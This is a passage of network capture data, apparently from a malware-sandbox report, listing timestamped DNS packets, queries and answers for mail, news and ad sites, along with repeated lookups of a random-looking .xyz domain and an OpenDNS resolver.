Jul 6, 2021 14:30:21.579977036 CEST	53	62833	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:22.220875978 CEST	59260	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:22.275522947 CEST	53	59260	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:22.803829908 CEST	49944	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:22.860054970 CEST	53	49944	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:23.131524086 CEST	63300	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:23.194888115 CEST	53	63300	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:23.392256975 CEST	61449	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:23.452138901 CEST	53	61449	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:23.973153114 CEST	51275	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:24.028079033 CEST	53	51275	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:24.763433933 CEST	63492	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:24.818941116 CEST	53	63492	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:25.074805021 CEST	58945	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:25.134272099 CEST	53	58945	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:25.645136118 CEST	60779	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:25.680813074 CEST	64014	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:25.736529112 CEST	53	64014	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:25.744410038 CEST	53	60779	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:26.060101032 CEST	57091	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:26.129261971 CEST	53	57091	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:26.641084909 CEST	55904	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:26.696901083 CEST	53	55904	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:27.255445957 CEST	52109	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:27.318406105 CEST	53	52109	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:27.691718102 CEST	54450	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:27.702317953 CEST	49374	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:27.748572111 CEST	53	54450	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:27.758177996 CEST	53	49374	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:28.317461014 CEST	50436	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:28.375650883 CEST	53	50436	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:28.679383039 CEST	62605	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:28.737227917 CEST	53	62605	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:29.232212067 CEST	54256	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:29.287676096 CEST	53	54256	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:35.726222992 CEST	52189	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:35.772088051 CEST	53	52189	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:36.421026945 CEST	56131	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:36.479466915 CEST	53	56131	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:36.746650934 CEST	62992	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:36.793477058 CEST	53	62992	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:37.018970966 CEST	54432	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:37.075551987 CEST	53	54432	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:37.341403008 CEST	57227	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:37.400434971 CEST	53	57227	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:37.688553095 CEST	58383	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:37.734209061 CEST	63136	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:37.745018005 CEST	53	58383	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:37.812722921 CEST	53	63136	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:38.235519886 CEST	50911	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:38.291610003 CEST	53	50911	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:38.460433006 CEST	63409	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:38.520617008 CEST	53	63409	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:38.523912907 CEST	59185	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:38.580883980 CEST	53	59185	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:41.137053013 CEST	64236	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:41.194951057 CEST	53	64236	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:41.956573963 CEST	56157	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:42.019243002 CEST	53	56157	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:42.234256029 CEST	55601	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:42.292562008 CEST	53	55601	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:43.874739885 CEST	52984	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:43.901608944 CEST	51141	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:43.936813116 CEST	53	52984	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:43.949042082 CEST	53	51141	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:49.424777985 CEST	53610	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:49.516295910 CEST	53	53610	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:52.067701101 CEST	61247	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:52.223323107 CEST	53	61247	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:59.946554899 CEST	65165	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:00.002360106 CEST	53	65165	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:00.216656923 CEST	52076	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:00.279405117 CEST	53	52076	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:01.828984976 CEST	54903	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:01.840909958 CEST	55045	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:01.886153936 CEST	53	54903	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:01.895236969 CEST	53	55045	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:01.965348959 CEST	54464	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:02.023242950 CEST	53	54464	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:07.333836079 CEST	50970	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:07.335467100 CEST	55261	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:07.388247967 CEST	53	50970	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:07.393089056 CEST	53	55261	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:11.232556105 CEST	59809	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:11.237359047 CEST	51278	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:11.293025970 CEST	53	59809	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:11.299817085 CEST	53	51278	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:14.321258068 CEST	51932	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:14.376348972 CEST	53	51932	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:17.065526962 CEST	59494	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:17.136307955 CEST	53	59494	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:21.696934938 CEST	55915	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:21.777508020 CEST	53	55915	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:24.945633888 CEST	49779	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:25.001909971 CEST	53	49779	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:30.092719078 CEST	49458	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:30.148782015 CEST	53	49458	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:35.329746962 CEST	57164	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:35.391314983 CEST	53	57164	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:47.471260071 CEST	49840	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:47.473866940 CEST	57174	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:47.517627001 CEST	53	49840	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:47.520133972 CEST	53	57174	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:47.752554893 CEST	58531	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:47.808881044 CEST	53	58531	8.8.8.8	192.168.2.4
Jul 6, 2021 14:31:48.299648046 CEST	49608	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:31:48.359704018 CEST	53	49608	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 6, 2021 14:29:37.924479008 CEST	192.168.2.4	8.8.8.8	0x930c	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:40.821963072 CEST	192.168.2.4	8.8.8.8	0x9c98	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:41.339418888 CEST	192.168.2.4	8.8.8.8	0x4115	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:41.412311077 CEST	192.168.2.4	8.8.8.8	0xcf34	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:43.908132076 CEST	192.168.2.4	8.8.8.8	0xdc33	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:44.231865883 CEST	192.168.2.4	8.8.8.8	0x9922	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:44.415155888 CEST	192.168.2.4	8.8.8.8	0xc075	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:44.545381069 CEST	192.168.2.4	8.8.8.8	0xdf9b	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.431371927 CEST	192.168.2.4	8.8.8.8	0x746f	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.447900057 CEST	192.168.2.4	8.8.8.8	0xface	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.098906994 CEST	192.168.2.4	8.8.8.8	0x854c	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.227508068 CEST	192.168.2.4	8.8.8.8	0xb8d8	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.464463949 CEST	192.168.2.4	8.8.8.8	0xb004	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.253243923 CEST	192.168.2.4	8.8.8.8	0x5309	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.873713970 CEST	192.168.2.4	8.8.8.8	0x8a4b	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:14.114526033 CEST	192.168.2.4	8.8.8.8	0x9331	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.157454014 CEST	192.168.2.4	8.8.8.8	0x40a6	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.768455029 CEST	192.168.2.4	8.8.8.8	0xdb79	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:19.061258078 CEST	192.168.2.4	8.8.8.8	0xce0e	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:25.074805021 CEST	192.168.2.4	8.8.8.8	0xe7dd	Standard query (0)	mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:25.680813074 CEST	192.168.2.4	8.8.8.8	0x58f5	Standard query (0)	www.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:26.060101032 CEST	192.168.2.4	8.8.8.8	0x5878	Standard query (0)	dl.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:26.641084909 CEST	192.168.2.4	8.8.8.8	0xc8ea	Standard query (0)	s.uicdn.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:27.255445957 CEST	192.168.2.4	8.8.8.8	0x826c	Standard query (0)	wa.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:27.691718102 CEST	192.168.2.4	8.8.8.8	0x375f	Standard query (0)	img.ui-portal.de	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:28.317461014 CEST	192.168.2.4	8.8.8.8	0x830a	Standard query (0)	plus.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.726222992 CEST	192.168.2.4	8.8.8.8	0x4ca4	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.421026945 CEST	192.168.2.4	8.8.8.8	0xe714	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.746650934 CEST	192.168.2.4	8.8.8.8	0x12a0	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.018970966 CEST	192.168.2.4	8.8.8.8	0x882e	Standard query (0)	mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.341403008 CEST	192.168.2.4	8.8.8.8	0x21c0	Standard query (0)	www.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.688553095 CEST	192.168.2.4	8.8.8.8	0x5cfe	Standard query (0)	s.uicdn.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.734209061 CEST	192.168.2.4	8.8.8.8	0x4e29	Standard query (0)	www.googleoptimize.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:38.460433006 CEST	192.168.2.4	8.8.8.8	0xd58d	Standard query (0)	wa.ui-portal.de	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:38.523912907 CEST	192.168.2.4	8.8.8.8	0x46ab	Standard query (0)	wa.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:41.956573963 CEST	192.168.2.4	8.8.8.8	0xfeb4	Standard query (0)	mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:42.234256029 CEST	192.168.2.4	8.8.8.8	0x3e62	Standard query (0)	www.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:43.874739885 CEST	192.168.2.4	8.8.8.8	0x2c89	Standard query (0)	wa.ui-portal.de	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:43.901608944 CEST	192.168.2.4	8.8.8.8	0x5e6f	Standard query (0)	wa.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:49.424777985 CEST	192.168.2.4	8.8.8.8	0x86bd	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:52.067701101 CEST	192.168.2.4	8.8.8.8	0x2ed6	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:59.946554899 CEST	192.168.2.4	8.8.8.8	0x2167	Standard query (0)	mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:00.216656923 CEST	192.168.2.4	8.8.8.8	0x432b	Standard query (0)	www.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:01.828984976 CEST	192.168.2.4	8.8.8.8	0x2807	Standard query (0)	wa.ui-portal.de	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:01.840909958 CEST	192.168.2.4	8.8.8.8	0x2205	Standard query (0)	wa.mail.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:01.965348959 CEST	192.168.2.4	8.8.8.8	0x8008	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:07.333836079 CEST	192.168.2.4	8.8.8.8	0xaf7a	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:07.335467100 CEST	192.168.2.4	8.8.8.8	0xbac8	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:11.232556105 CEST	192.168.2.4	8.8.8.8	0xc237	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:11.237359047 CEST	192.168.2.4	8.8.8.8	0xf56f	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:14.321258068 CEST	192.168.2.4	8.8.8.8	0x3a32	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:24.945633888 CEST	192.168.2.4	8.8.8.8	0x1c32	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:30.092719078 CEST	192.168.2.4	8.8.8.8	0x2ad5	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:35.329746962 CEST	192.168.2.4	8.8.8.8	0xdb00	Standard query (0)	taybhctdyehfhgthp2.xyz	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:47.471260071 CEST	192.168.2.4	8.8.8.8	0x33c7	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:47.473866940 CEST	192.168.2.4	8.8.8.8	0x7be8	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 6, 2021 14:29:37.973083973 CEST	8.8.8.8	192.168.2.4	0x930c	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:40.887712955 CEST	8.8.8.8	192.168.2.4	0x9c98	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:41.394079924 CEST	8.8.8.8	192.168.2.4	0x4115	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:41.394079924 CEST	8.8.8.8	192.168.2.4	0x4115	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:41.485426903 CEST	8.8.8.8	192.168.2.4	0xcf34	No error (0)	contextual.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:43.974461079 CEST	8.8.8.8	192.168.2.4	0xdc33	No error (0)	hblg.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:44.298285007 CEST	8.8.8.8	192.168.2.4	0x9922	No error (0)	lg3.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:44.471496105 CEST	8.8.8.8	192.168.2.4	0xc075	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:44.591345072 CEST	8.8.8.8	192.168.2.4	0xdf9b	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:44.591345072 CEST	8.8.8.8	192.168.2.4	0xdf9b	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:45.486419916 CEST	8.8.8.8	192.168.2.4	0x746f	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:45.486419916 CEST	8.8.8.8	192.168.2.4	0x746f	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.486419916 CEST	8.8.8.8	192.168.2.4	0x746f	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.486419916 CEST	8.8.8.8	192.168.2.4	0x746f	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.486419916 CEST	8.8.8.8	192.168.2.4	0x746f	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.505383968 CEST	8.8.8.8	192.168.2.4	0xface	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:29:45.505383968 CEST	8.8.8.8	192.168.2.4	0xface	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Jul 6, 2021 14:29:45.505383968 CEST	8.8.8.8	192.168.2.4	0xface	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:01.148099899 CEST	8.8.8.8	192.168.2.4	0x854c	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	HHN-efz.ms-acdc.office.com		52.97.201.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	HHN-efz.ms-acdc.office.com		52.98.171.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.34	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.284509897 CEST	8.8.8.8	192.168.2.4	0xb8d8	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	FRA-efz.ms-acdc.office.com		52.97.144.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	FRA-efz.ms-acdc.office.com		52.97.144.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:02.513778925 CEST	8.8.8.8	192.168.2.4	0xb004	No error (0)	FRA-efz.ms-acdc.office.com		52.97.188.66	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.299593925 CEST	8.8.8.8	192.168.2.4	0x5309	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.18	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.18	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:13.933329105 CEST	8.8.8.8	192.168.2.4	0x8a4b	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	FRA-efz.ms-acdc.office.com		40.101.81.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	FRA-efz.ms-acdc.office.com		52.97.250.226	A (IP address)	IN (0x0001)
